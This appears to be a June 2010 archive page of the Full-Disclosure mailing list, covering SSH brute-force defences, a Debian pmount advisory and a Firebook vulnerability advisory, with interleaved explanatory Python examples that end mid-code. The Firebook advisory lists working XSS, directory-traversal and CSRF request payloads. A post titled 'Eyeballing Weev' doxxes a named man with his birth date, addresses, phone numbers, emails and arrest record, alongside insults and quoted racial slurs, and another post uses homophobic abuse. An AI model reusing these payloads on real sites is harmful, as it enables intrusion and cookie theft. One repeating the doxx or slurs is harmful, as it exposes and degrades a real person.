TEHTRI-SA-2010-017 - Vuln in Liberty Exploit Pack. Permanent XSS+XSRF.
TEHTRI-SA-2010-016 - Vuln in Liberty Exploit Pack. SQL Injection.
TEHTRI-SA-2010-015 - Vuln in Eleonore Exploit Pack. Another SQL Inject.
TEHTRI-SA-2010-014 - Vuln in Eleonore Exploit Pack. XSRF in admin panel.
TEHTRI-SA-2010-013 - Vuln in Eleonore Exploit Pack. Permanent XSS.
TEHTRI-SA-2010-012 - Vuln in Eleonore Exploit Pack. Remote SQL Inject.
TEHTRI-SA-2010-011 - Vuln in Sniper_SA Web Backdoor. Remote File Disclos

More explanations available on our web site:
http://www.tehtri-security.com/en/news.php

Do not hesitate to contact us directly if needed.

Best regards,
Take care.

Laurent OUDOT - "TEHTRI-Security, This is not a game."
 CEO & Founder of TEHTRI-Security
 http://www.tehtri-security.com/



Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Michael Holstein

> Note that with iptables you can leave ssh on port 22 but have it answer
> on other ports.  See http://proxyobsession.net/?p=869
>   

Or just change the entry in /etc/ssh/sshd_config:

# What ports, IPs and protocols we listen for
Port 22

From sshd_config(5):

Port    Specifies the port number that sshd(8) listens on.  The default
        is 22.  Multiple options of this type are permitted.  See also
        ListenAddress.

Cheers,

Michael Holstein
Cleveland State University




Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread dink

Um, yeah... that's exactly what I recommend in the article, which I'm
sure you read. ;o)

The original suggestion was "If you want SSH on a different port, do
this with firewall rules".

Way too much work, IMO.

 Original Message 
Subject: Re: [Full-disclosure] targetted SSH bruteforce attacks
From: Michael Holstein 
Date: Thu, June 17, 2010 1:35 pm
To: d...@mrhinkydink.com
Cc: full-disclosure@lists.grok.org.uk


> Note that with iptables you can leave ssh on port 22 but have it answer
> on other ports. See http://proxyobsession.net/?p=869
> 

Or just change the entry in /etc/ssh/sshd_config:

# What ports, IPs and protocols we listen for
Port 22

From sshd_config(5):

Port    Specifies the port number that sshd(8) listens on.  The default
        is 22.  Multiple options of this type are permitted.  See also
        ListenAddress.

Cheers,

Michael Holstein
Cleveland State University



Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Xin LI
On FreeBSD you can probably just use the following pf.conf line to
block most of such attacks:

block in quick proto tcp from any os "Linux" to any port ssh

(Note that with this you may lose the ability to login from any Linux
based box including from an Android phone, etc)

Of course it's wise to disable password authentication and just use
public key authentication.

Cheers,



Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Paul Schmehl
--On Thursday, June 17, 2010 09:38:02 -0700 "Randal L. Schwartz" 
 wrote:

>> "Emmanuel" == Emmanuel VERCHERE  writes:
>
> Emmanuel> SSH daemons using password auth exposed to the Internet _do_
> Emmanuel> get bruteforce attempts. I would not recommend moving it to a
> Emmanuel> different port than 22 as that would be of very, _very_ little
> Emmanuel> help - rather switch to public key auth (plus SPA if you're
> Emmanuel> paranoid), et voila.
>
> After being regularly nailed on my port 22, I *did* move it.  I've had
> only *one* attack since then, down by a factor of 20 or so.
>
> Yes, it's worth it to not be on port 22, as long as you're one of the
> few. :)  Remember, these bots are going for low-hanging fruit... it's
> not worth it for them to hit all 65k ports.
>
> Now, if we *all* move away from 22, your advice is more appropriate.

Of course if you do account provisioning correctly and configure your hosts 
securely, you're not exposed on port 22 either.  You just have to deal with the 
constant knocking at the door.  Some of us have simply learned to ignore it. 
It's just the background noise of the internet.

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
***
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson



Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Paul Schmehl
--On Thursday, June 17, 2010 11:04:52 -0700 Xin LI  wrote:

> On FreeBSD you can probably just use the following pf.conf line to
> block most of such attacks:
>
> block in quick proto tcp from any os "Linux" to any port ssh
>
> (Note that with this you may lose the ability to login from any Linux
> based box including from an Android phone, etc)
>
> Of course it's wise to disable password authentication and just use
> public key authentication.

Why?  Ssh is encrypted, so you're not exposing a password when you login.  How 
does public key authentication make you more secure (in a practical sense)?

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
***
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson



Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread John Jacobs


> > Of course it's wise to disable password authentication and just use
> > public key authentication.
> 
> Why?  Ssh is encrypted, so you're not exposing a password when you login.  
> How 
> does public key authentication make you more secure (in a practical sense)?
> 

Paul, it's more secure in that brute force attacks are mitigated because the 
private key is required by the client and the public key must appear in 
~/.ssh/authorized_keys.  Disabling password authentication means a weak 
password on an account cannot be compromised by brute force or other discovery 
efforts.  A password on the private key provides even greater defense-in-depth 
security.

Disable password authentication and enforce key-pair authentication and 
targeted brute-force attacking becomes moot very quickly.  Moving SSHd from TCP 
22 also keeps the script-kiddies and automated scanners away.

After doing these two basic things then it's time to focus on fail2ban, 
denyhosts, and the other firewall integrating solutions.



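The thread's two concrete recommendations, key-only authentication and a listener off port 22, are a few sshd_config keywords, but two sshd_config(5) rules bite when checking a config file: when a keyword appears more than once the first value wins, and keywords under a Match line apply only to connections matching it. The parser and audit below are an added example written for this page, not code from the thread or from OpenSSH; they honour both rules and report a weak configuration beside a hardened one. The config texts are constructed, the EXPECTED and DEFAULTS tables are this example's choices (DEFAULTS reflect OpenSSH's compiled-in defaults of the time, when PermitRootLogin defaulted to yes), and a real audit should read the file sshd actually loads, or better, the effective configuration that `sshd -T` prints.

```python
import re

# Global values a hardened host should carry, and OpenSSH's compiled-in
# defaults of the period (PermitRootLogin defaulted to "yes" then).
EXPECTED = {
    "passwordauthentication": "no",
    "challengeresponseauthentication": "no",
    "pubkeyauthentication": "yes",
    "permitrootlogin": "no",
    "permitemptypasswords": "no",
}
DEFAULTS = {
    "passwordauthentication": "yes",
    "challengeresponseauthentication": "yes",
    "pubkeyauthentication": "yes",
    "permitrootlogin": "yes",
    "permitemptypasswords": "no",
}
MULTI = {"port", "listenaddress"}  # may legitimately appear more than once


def _split(line):
    """'Keyword value', 'Keyword=value' or 'Keyword = value' -> (kw, value)."""
    parts = re.split(r"[\s=]+", line, maxsplit=1)
    return parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")


def parse_sshd_config(text):
    """Return (global_opts, match_blocks).

    global_opts : keyword -> value from its FIRST occurrence; sshd ignores
                  later duplicates (sshd_config(5)). Port/ListenAddress
                  accumulate into a list.
    match_blocks: [(criteria, {keyword: value}), ...]; everything after a
                  Match line belongs to that block, not to the global scope.
    """
    global_opts, match_blocks, current = {}, [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, value = _split(line)
        if key == "match":
            current = {}
            match_blocks.append((value, current))
            continue
        scope = global_opts if current is None else current
        if key in MULTI:
            scope.setdefault(key, []).append(value)
        else:
            scope.setdefault(key, value)  # first occurrence wins
    return global_opts, match_blocks


def audit(text):
    """Return a list of findings; an empty list means nothing to report."""
    g, matches = parse_sshd_config(text)
    findings = []
    for key, want in EXPECTED.items():
        got = g.get(key, DEFAULTS[key]).lower()
        if got != want:
            origin = "set" if key in g else "default"
            findings.append(f"{key} is {got} ({origin}); want {want}")
    if "22" in g.get("port", ["22"]):
        findings.append("sshd listens on port 22: expect scanner noise")
    for crit, opts in matches:
        if opts.get("passwordauthentication", "").lower() == "yes":
            findings.append(f"Match {crit} re-enables PasswordAuthentication")
    return findings


# Constructed configs for the demo (not from any real host).
WEAK = """\
Port 22
Protocol 2
PermitRootLogin yes
PasswordAuthentication yes
"""

HARDENED = """\
Port 2222
Protocol 2
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
PermitEmptyPasswords no
# Ignored by sshd: the first value above wins. A tool that takes the last
# value would wrongly report this host as password-enabled.
PasswordAuthentication yes
Match Address 10.0.0.0/8
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit(cfg) or ["ok"])
```

The hardened sample deliberately carries a duplicate PasswordAuthentication line and a Match block that re-enables passwords for one address range: the first is harmless and the audit must not flag it, the second is a real hole for connections from that range and the audit must. Scanners that grep for the last matching line get both cases wrong.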
Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Mr. MailingLists
Hello Gary/List!

On 6/17/2010 6:48 AM, Gary Baribault wrote:
> Hello list,
> 
> I have a strange situation and would like information from the
> list members. I have three Linux boxes exposed to the Internet. Two of
> them are on cable modems, and both have two services that are publicly
> available. In both cases, I have SSH and named running and available
> to the public. Before you folks say it, yes I run SSH on TCP/22 and no
> I don't want to move it to another port, and no I don't want to
> restrict it to certain source IPs.

Since almost every angle of securing SSHD publicly has already been listed I
will not delve into that, so take my advice with a grain of salt.

In my environment, in order to access any of what I call trusted resources
(such as ssh) I require myself to have VPN connectivity. This eliminates the
need of having SSHD listen publicly, and as expected, eliminated all unknown
hosts accessing my box via SSHD. It also made my auth log much shorter and
manageable as well :), but it is also more boring.

I'm guessing this won't work for your situation (seeing that you don't want
to change the public port either).

Otherwise, as said before:
Changing the port will absolutely reduce the number of hits, and concurrent
attack attempts.

Use of port-knocking techniques will also achieve the above, and the use of
PKA will almost (almost, nothing is certain, hehe Debian) eliminate the chance
of the opposition recreating your private key.



Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Mark Byrne
It's impossible for anyone on this mailing list to know if the attack is
personal or not, unless they are actually involved in the attack. Use a
password such as 7%Ônç#®]�...@ãnÝèÅ#çñ] and watch them hack away to their
heart's content.

On 17/06/2010 13:48, Gary Baribault wrote:
> Hello list,
> 
> I have a strange situation and would like information from the
> list members. I have three Linux boxes exposed to the Internet. Two of
> them are on cable modems, and both have two services that are publicly
> available. In both cases, I have SSH and named running and available
> to the public. Before you folks say it, yes I run SSH on TCP/22 and no
> I don't want to move it to another port, and no I don't want to
> restrict it to certain source IPs.
> 
> Both of these systems are within one /21 and get attacked
> regularly. I run Denyhosts on them, and update the central server once
> an hour with attacking IPs, and obviously also download the public
> hosts.deny list.
> 
> These machines get hit regularly, so often that I don't really
> care, it's fun to make the script kiddies waste their time! But in
> this instance, only my home box is being attacked... someone is
> burning a lot of cycles and hosts to do a distributed dictionary
> attack on my one box! The named daemon is non recursive, properly
> configured, up to date and not being attacked.
> 
> Is anyone else seeing this type of attack? Or is someone really
> targeting MY box?
> 
> Thanks
> 
> 
> Gary Baribault
> Courriel: g...@baribault.net
> GPG Key: 0x685430d1
> Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1
> 
> 



Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread iRAQi BlackHat
Answering the question of the topic: Yes.

If you plug-in a completely a new box to the internet, and watch the logs
you shall see there is an attack going on. The net is full of automated BOTS
running and they just keep hitting you (randomly or something).

BTW, a good solution to these problems is a Port-Knocking system, which
makes your service completely unexposed. See Tariq or any other PK system:
http://code.google.com/p/tariq/
http://www.portknocking.org/view/implementations


Regards,

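A port-knocking gate of the kind the post points to works like this: the firewall keeps the service port closed, a daemon watches for a secret sequence of connection attempts from a source, and only a source that completes the sequence, in order and within a time limit, gets the port opened for it. The model below is an added example written for this page, not code from Tariq or any other implementation linked above; it is an in-memory state machine fed with (source, destination port, time) events, with the two checks that matter: a wrong port resets progress and a slow knock expires it. Port numbers, addresses and timings are constructed.

```python
class KnockDaemon:
    """In-memory model of a port-knocking gate in front of one protected port.

    Each source must hit the secret ports in order, each knock within
    `window` seconds of the previous one. A knock on any other port resets
    that source's progress, so a sequential sweep cannot walk through the
    sequence unless the sequence itself is a run of consecutive ascending
    ports. Completing the sequence opens the protected port to that source
    for `open_for` seconds.
    """

    def __init__(self, sequence, protected_port=22, window=5.0, open_for=30.0):
        if len(sequence) < 2 or len(set(sequence)) != len(sequence):
            raise ValueError("sequence must be at least two distinct ports")
        if protected_port in sequence:
            raise ValueError("protected port cannot be part of the sequence")
        self.sequence = list(sequence)
        self.protected_port = protected_port
        self.window = window
        self.open_for = open_for
        self._progress = {}    # src -> (index of next expected port, time of last knock)
        self._open_until = {}  # src -> expiry time of the opened door

    def knock(self, src, dport, now):
        """Record one inbound SYN from src to dport at time now.

        Returns True only for the knock that completes the sequence.
        """
        idx, last = self._progress.get(src, (0, None))
        if last is not None and now - last > self.window:
            idx = 0  # too slow: start over
        if dport == self.sequence[idx]:
            idx += 1
        elif dport == self.sequence[0]:
            idx = 1  # wrong port, but it is the start of a fresh attempt
        else:
            idx = 0  # any other port resets progress
        if idx == len(self.sequence):
            self._open_until[src] = now + self.open_for
            self._progress.pop(src, None)
            return True
        self._progress[src] = (idx, now)
        return False

    def allowed(self, src, now):
        """Firewall decision for a SYN from src to the protected port."""
        return now <= self._open_until.get(src, float("-inf"))


def sweep_opens_door(daemon, src, ports, start=0.0, gap=0.01):
    """Feed a port sweep (one SYN per port, `gap` seconds apart) and report
    whether any knock in it completed the sequence."""
    return any(daemon.knock(src, p, start + i * gap) for i, p in enumerate(ports))


if __name__ == "__main__":
    d = KnockDaemon([7000, 8000, 9000])
    for t, port in ((0.0, 7000), (1.0, 8000), (2.0, 9000)):
        print(f"t={t}: knock {port} -> opened={d.knock('198.51.100.5', port, t)}")
    print("allowed at t=3:", d.allowed("198.51.100.5", 3.0))
    print("allowed at t=40:", d.allowed("198.51.100.5", 40.0))
    print("sweep vs [7000,7001,7002]:",
          sweep_opens_door(KnockDaemon([7000, 7001, 7002]), "10.0.0.1", range(7000, 9001)))
```

The sweep helper shows the caveat a practitioner should test for: a plain sequential scan is defeated by the reset rule unless the sequence itself is a run of consecutive ascending ports, so do not pick one. A fixed sequence is also replayable by anyone who can observe the knocks on the path, which is what the single-packet-authorisation (SPA) variant mentioned earlier in the thread is meant to address; nothing in this model authenticates the knocker.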
[Full-disclosure] Eyeballing Weev (Updated)

2010-06-17 Thread Eyeballing Weev
 Eyeballing Andrew Alan Escher Auernheimer
Delusional - IRC warrior - crack smoker - drug addict - bullshitter - jail
bitch - dwarf - hypocrite - idiot


  Proverbs 13:3 "Whoever controls his mouth protects his own life. Whoever
has a big mouth comes to ruin."


Contents:

1. Personal Info
2. Family
3. WHOIS info
4. Emails


Introduction:

Andrew, better known as weev, is a delusional young man who think he is
greater than he actually is. He hibernates on IRC,
babbles when smoked up on moon rocks, makes insane claims without any
evidence nor anyone calling him out about it, and
encourages others to join in his self-destructive behavior. His family hates
him and have not had contact with him for
over 2 years. Pictures of Andrew, which are widely available, show his
decline from his NY Times days (clean shaved),
to some of his pictures with long hair, and all the way up to his drug
arrest on 06/15/2010 where he looks like some flavor
of street bum begging you for the change you hear in your pocket but you
tell the bum it's your car keys just so you can
make a quick getaway.

Andrew, you should spend time in jail, which will detox your body of moon
rocks and your other drugs of preference. I'm
sure after a year or two of detox, avoiding prison rape, and begging for
protection from skinhead prison gangs - you'll
realize that your delusional life on IRC is not worth it so you will come
out of jail and live a normal, productive,
drug-free life.



--Personal Info

Full name: Andrew Alan Escher Auernheimer aka "weev"

According to LinkedIn, Weev is "White", Native-American, and "other"

Aliases: Joseph Evers
 Andrew Wbeelsoi
 Escher Auernheimer

DOB: 09/01/1985 (Confirmed by arrest and "Vinelink" notification service for
when he is released)
Eyes: Brown
Hair: Brown
Height: 5'4"
Weight: 150lbs

(Source: 06/15/2010 drug arrest)

Education: James Madison University
"Auernheimer, Andrew A. attended JMU from the fall of 1998 to the spring of
2000 studying Anthropology" -Registrar Office of JMU


Last known addresses: 505 N SHADY AVE. FAYETTEVILLE, AR 72701 (Source:
06/15/2010 arrest)
*Note: Address belongs to - McElveen & Rush Plc. 505 N Shady Ave.
Fayetteville, AR 72701. 479-973-2900

Phone numbers: 323-879-8007 (Source: SealPAC WHOIS)
   479-363-1488 (Source: LinkedIn)

Email addresses: glutt...@gmail.com and weev...@yahoo.com

Criminal Record:
06/15/2010 - Washington County, Arkansas. Booked for possession of LSD,
cocaine, MDMA (ecstasy), and various controlled pills by Fayetteville PD.
??/??/2010 - Giving a false name to authorities.


URLs:
http://www.facebook.com/people/Joseph-Evers/1208740546#!/profile.php?id=1208740546
http://www.okcupid.com/profile/weev/pictures
http://www.linkedin.com/in/josephevers (known alias)
http://www.encyclopediadramatica.com/index.php/weev
http://weev.livejournal.com

Online Aliases:

- Weev
- Wbeelsoi
- Uchiha Weevlos
- Weevlar
- Andrew wbeelsoi
- Andrew weevlos
- The iProhet
- TheiProphet
- The-iProphet

Media sightings:

-iPad/AT&T Drama
Initial iPad/AT&T story: http://news.cnet.com/8301-27080_3-20007309-245.html
AT&T criticism of weev: http://news.cnet.com/8301-1009_3-20007564-83.html
Weev's response: http://news.cnet.com/8301-27080_3-20007407-245.html
Arrest for drug possession:
http://news.cnet.com/8301-27080_3-20007827-245.html
Confirmed FBI involvement in search:
http://online.wsj.com/article/SB10001424052748704198004575310634055906968.html?mod=WSJ_Tech_LEADTop

Toorcon2111, Cybercrime:
http://video.google.com/videoplay?docid=-5643217366887354926&ei=iOzHSvzBOpbWrQKvlu2KDg&q=andrew+wbeelsoi

http://www.jewishreview.org/local/Police-question-two-men-about-threats-to-Jewish-community
*Note: Weev was raged about being named. Source:
http://www.webcitation.org/5jnP71qsD

NYTimes "Mawebulence" Expose:
http://www.nytimes.com/2008/08/03/magazine/03trolls-t.html?_r=1&hp&oref=slogin
*Note: NYTimes article is typical of Andrew's ranting- making claims with no
proof to back it up.

Hilarious Logs:

09:50  i gotta get some money
09:50  my cashflow sucks
09:51  whores
09:51  lavish cars
09:51  gigantic places to live

15:05  does anybody know these russians
15:06  that they are buying up hacked macs for 43 cents an install
15:26  i have access to like
15:26  8k rooted macs
15:26  right now
15:26  and i would like to make a quick $3500

22:02  im all for white people cleaning up the nigger problem
22:03  i hate niggers
22:03  i hate niggers.

(Note: Chelsea and Anthony Auernheimer, his siblings, are African-American)

02:23  i read what the kikes did to you
02:23  i raged :(
02:24  lol
02:24  i dont mind
02:24  theyre doin me a favor

"seriously. we need a sysop faq that is sure to state that the only
person we are allowed to mention when talking about ED ownership is
joseph evers." -- weev, 20080531, correspondence

"yes please scrub realnames from ED" -- weev, 20080531, correspondence



--Family:


Latest home address:
2038 W Grace 

[Full-disclosure] [SECURITY] [DSA 2063-1] New pmount packages fix denial of service

2010-06-17 Thread Giuseppe Iuculano
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-2063-1  secur...@debian.org
http://www.debian.org/security/Giuseppe Iuculano
June 17, 2010 http://www.debian.org/security/faq
- 

Package: pmount
Vulnerability  : insecure temporary file
Problem type   : local
Debian-specific: no
CVE Id : CVE-2010-2192


Dan Rosenberg discovered that pmount, a wrapper around the standard mount
program which permits normal users to mount removable devices without a
matching /etc/fstab entry, creates files in /var/lock insecurely.
A local attacker could overwrite arbitrary files utilising a symlink attack.


For the stable distribution (lenny), this problem has been fixed in
version 0.9.18-2+lenny1

For the unstable distribution (sid), this problem has been fixed in
version 0.9.23-1, and will migrate to the testing distribution (squeeze)
shortly.

We recommend that you upgrade your pmount package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18.orig.tar.gz
Size/MD5 checksum:   436009 d04973bde34edac7dd2e50bfe8f10700
  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1.dsc
Size/MD5 checksum: 1202 d2a121965c3af232694c8df63821d713
  
http://security.debian.org/pool/updates/main/p/pmount/pmount_0.9.18-2+lenny1.diff.gz

  These files will probably be moved into the stable distribution on
  its next update.

- ---
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show ' and http://

[Full-disclosure] Vulnerabilities in Firebook

2010-06-17 Thread MustLive
Hello Full-Disclosure!

I want to warn you about security vulnerabilities in Firebook.

-
Advisory: Vulnerabilities in Firebook
-
URL: http://websecurity.com.ua/4124/
-
Affected products: all versions of Firebook.
-
Timeline:

27.09.2009 - found vulnerabilities.
13.04.2010 - announced at my site.
24.05.2010 - informed developers.
17.06.2010 - disclosed at my site.
-
Details:

These are Information Leakage, Cross-Site Request Forgery, Cross-Site
Scripting, Directory Traversal and Full path disclosure vulnerabilities.

Information Leakage:

http://site/path_to_firebook_admin/?URLproxy=http://firebook.ru/env/index.html;

CSRF:

http://site/path_to_firebook_admin/?URLproxy=http://site;

CSRF-attacks on other sites are possible.

XSS:

http://site/path_to_firebook_admin/?URLproxy=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/guestbook/index.html?answer=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/guestbook/index.html?answer=guestbook/guest/file.html;page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Directory Traversal:

http://site/path_to_firebook_admin/?param=1;show=../.htaccess;

http://site/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html

Full path disclosure:

http://site/path_to_firebook_admin/?param=1;show=param.txt;

http://site/guestbook/index.html?answer=guestbook/guest/1

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Sebastian Rother
On Thu, 17 Jun 2010 16:56:41 -0500
"Mr. MailingLists"  wrote:

> Hello Gary/List!
> 
> On 6/17/2010 6:48 AM, Gary Baribault wrote:
> > Hello list,
> > 
> > I have a strange situation and would like information from the
> > list members. I have three Linux boxes exposed to the Internet. Two of
> > them are on cable modems, and both have two services that are publicly
> > available. In both cases, I have SSH and named running and available
> > to the public. Before you folks say it, yes I run SSH on TCP/22 and no
> > I don't want to move it to another port, and no I don't want to
> > restrict it to certain source IPs.

Ok I strongly dislike this non-working blafoobiztalk.
Are you all gayhats like FX who works for whoever pays most?


Guys SSH attacks.. hey this aint the 80's.
OpenBSD PF is always HANDY for LIMITING A CONNECTION/PER_AMOUNT_OF_TIME
and thus automatically blocking such crap after 4 trials or so!

I am deeply disappointed imho: What is this list... a mailinglist of
whiners? YOU EXPOSED X LINUX HOSTS... OK! (LINUX wont matter, could be
MS "remote desktop" or whatever) Linux is deeply fucked up (well CISCO
looked for an OS as fucked up as IOS.. thus LINUX... CISCO ASA greets
you...) and OpenBSD aint PERFECT either (hello Henning and Theo.. hello
TCP/IP Stack or recent PF changes..). But OpenBSD's "PF" could limit the
attacks you describe pretty nicely (and here I have to thank Henning
and others for their free time imho, what you made is imho working at
least).

So what is risky about SSH-Attacks? I have multiple installations of
self-defending oBSD frontend-firewalls working for big customers
against such shit. It aint even about SSH, say telnet (hello CISCO
folks who deeply love Helith imho somehow *http logs*... what about a
real own SSH and not forwarding your customers to an OpenSSH
mailinglist... dipshits.. or what about making a donation to openBSD
you fucktards? Hiring FX wont make a change...)  or SMTP or POP3 or
whatever protocol needs an authentication.

And Hell I have even not thanked Theo or others for making it ALL
(together) possible (of course there is some salt in every soup..). No
matter if they like me or not..  but sometimes their ideas are alright
(even if the code quality lags behind in some parts..).

You are looking for an EASY WAY to collect Bots? OpenBSD PF with some
"ideas" from you is your friend. So I await to see your donation to the
OpenBSD project...

If you make all the entries to get entered into the spamd-list spamd can
even distribute your "lists of bots" to other hosts... just as a hint
(and as criticism that some people have to abuse spamd for this..).
At least I abuse spamd like this sometimes. ;-D



Kind regards,
rmb



Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Xin LI
On Thu, Jun 17, 2010 at 1:21 PM, Paul Schmehl  wrote:
> --On Thursday, June 17, 2010 11:04:52 -0700 Xin LI 
> wrote:
>
>> On FreeBSD you can probably just use the following pf.conf line to
>> block most of such attacks:
>>
>> block in quick proto tcp from any os "Linux" to any port ssh
>>
>> (Note that with this you may lose the ability to login from any Linux
>> based box including from an Android phone, etc)
>>
>> Of course it's wise to disable password authentication and just use
>> public key authentication.
>
> Why?  Ssh is encrypted, so you're not exposing a password when you login.
>  How does public key authentication make you more secure (in a practical
> sense)?

Well, I usually avoid the term "more secure" since it really depends
on the real usage and scenario.

The benefits of using public key authentication are:
 - A typical 2048-bit key pair offers much more entropy than a password
average people can comfortably remember, making it practically
impossible to crack by brute force.
 - It does not transfer any credential information that can be used if
cracked, i.e. the authentication process is a kind of
zero-knowledge proof, say, "I have the key but you won't see it"
rather than "I have the password and here it is" (*).  Password
authentication is usually just plain text over an encrypted channel.

Downsides are mostly on the human side, e.g.:
 - Survey says that many people won't encrypt their private key and
protect it properly, nor treat forwarded agents in a secure manner;
 - It's not quite convenient if one doesn't have immediate access to
their private key, e.g. a system administrator traveling without his
laptop; but arguably, this case should never happen since using
passwords on an untrusted system is much more dangerous.


(*) This can of course be improved, though I am not aware of any
alternative that does not impose more restrictions.

Cheers,
-- 
Xin LI  http://www.delphij.net


Re: [Full-disclosure] Introducing TGP...

2010-06-17 Thread Pavel Kankovsky
On Mon, 14 Jun 2010, lsi wrote:

> [...] cracking some files protected by ancient crypto.

Ancient crypto? Five or so years ago I met a "big business" application 
using an encryption algorithm based on the Vigenere cipher (you know, 
that 450 year old thing *not* invented by Blaise de Vigenere). :)

-- 
Pavel Kankovsky aka Peak  / Jeremiah 9:21\
"For death is come up into our MS Windows(tm)..." \ 21st century edition /




Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Thor (Hammer of God)
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-
> boun...@lists.grok.org.uk] On Behalf Of Sebastian Rother
> 
> Ok I strongly dislike this non-working blafoobiztalk.
> Are you all gayhats like FX who works for whoever pays most?

Working for whoever pays most makes us gay?

I'll take gay and rich over poor and stupid any day.   And by the way, just so 
that you know, there are well established psychological profiles outlining a 
man's propensity to go out of his way to challenge other men as being "gay."  
I'm just sayin'.

P.S.  FX is a great guy.   You are of course welcome to your opinion, but 
actually posting like you did is seriously immature.  

t



Re: [Full-disclosure] targetted SSH bruteforce attacks

2010-06-17 Thread Pavel Kankovsky
On Thu, 17 Jun 2010, Gary Baribault wrote:

> someone is burning a lot of cycles and hosts to do a distributed
> dictionary attack on my one box!

Did you say distributed? We are experiencing a distributed attack right
now. An IP connects to a certain fixed set of SSH servers in our network,
makes a handful of login attempts against every individual server, and
disconnects, never to be seen again. The whole scenario repeats with a new
IP every minute or so. The set of servers is quite small, only circa 15 out
of many tens available in our whole network.

-- 
Pavel Kankovsky aka Peak  / Jeremiah 9:21\
"For death is come up into our MS Windows(tm)..." \ 21st century edition /



Re: [Full-disclosure] Introducing TGP...

2010-06-17 Thread lsi
http://en.wikipedia.org/wiki/Vigenere_cipher

"This cipher is well known because while it is easy to understand and 
implement, it often appears to beginners to be unbreakable; this 
earned it the description le chiffre indéchiffrable (French for 'the 
unbreakable cipher'). Consequently, many people have tried to 
implement encryption schemes that are essentially Vigenère ciphers, 
only to have them broken[1]."

1. Smith, Laurence D. (1943). "Substitution Ciphers". Cryptography 
the Science of Secret Writing: The Science of Secret Writing. Dover 
Publications. pp. 81. ISBN 0-486-20247-X.

Stu

On 18 Jun 2010 at 2:00, Pavel Kankovsky wrote:

Date sent:  Fri, 18 Jun 2010 02:00:48 +0200 (CEST)
From:   Pavel Kankovsky 
To: full-disclosure@lists.grok.org.uk
Subject:Re: [Full-disclosure] Introducing TGP...

> On Mon, 14 Jun 2010, lsi wrote:
> 
> > [...] cracking some files protected by ancient crypto.
> 
> Ancient crypto? Five or so years ago I met a "big business" application 
> using an encryption algorithm based on the Vigenere cipher (you know, 
> that 450 year old thing *not* invented by Blaise de Vigenere). :)
> 
> -- 
> Pavel Kankovsky aka Peak  / Jeremiah 9:21\
> "For death is come up into our MS Windows(tm)..." \ 21st century edition /
> 
> 



---
Stuart Udall
stuart a...@cyberdelix.dot net - http://www.cyberdelix.net/

--- 
 * Origin: lsi: revolution through evolution (192:168/0.2)
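
What "broken" means for the Vigenère-style schemes Pavel and the Wikipedia quote above refer to, as an added example that is not part of either post: a Vigenère implementation next to a ciphertext-only break that recovers the key, first the period from the index of coincidence, then each column as a Caesar shift fitted to English letter frequencies with chi-squared. The sample paragraph (public domain) and the key TGP are constructed values.

```python
from string import ascii_uppercase as A

# Relative English letter frequencies A..Z in percent (standard published table).
ENG = [8.167, 1.492, 2.782, 4.253, 12.702, 2.228, 2.015, 6.094, 6.966, 0.153, 0.772,
       4.025, 2.406, 6.749, 7.507, 1.929, 0.095, 5.987, 6.327, 9.056, 2.758, 0.978,
       2.360, 0.150, 1.974, 0.074]

def clean(text):
    """Letters only, upper-cased: the classic cipher alphabet."""
    return "".join(c for c in text.upper() if c in A)

def vigenere(text, key, decrypt=False):
    """Shift each letter by the matching (upper-case) key letter; subtract when decrypting."""
    out = []
    for i, c in enumerate(clean(text)):
        k = A.index(key[i % len(key)])
        out.append(A[(A.index(c) + (-k if decrypt else k)) % 26])
    return "".join(out)

def index_of_coincidence(col):
    n = len(col)
    return sum(col.count(c) * (col.count(c) - 1) for c in A) / (n * (n - 1)) if n > 1 else 0.0

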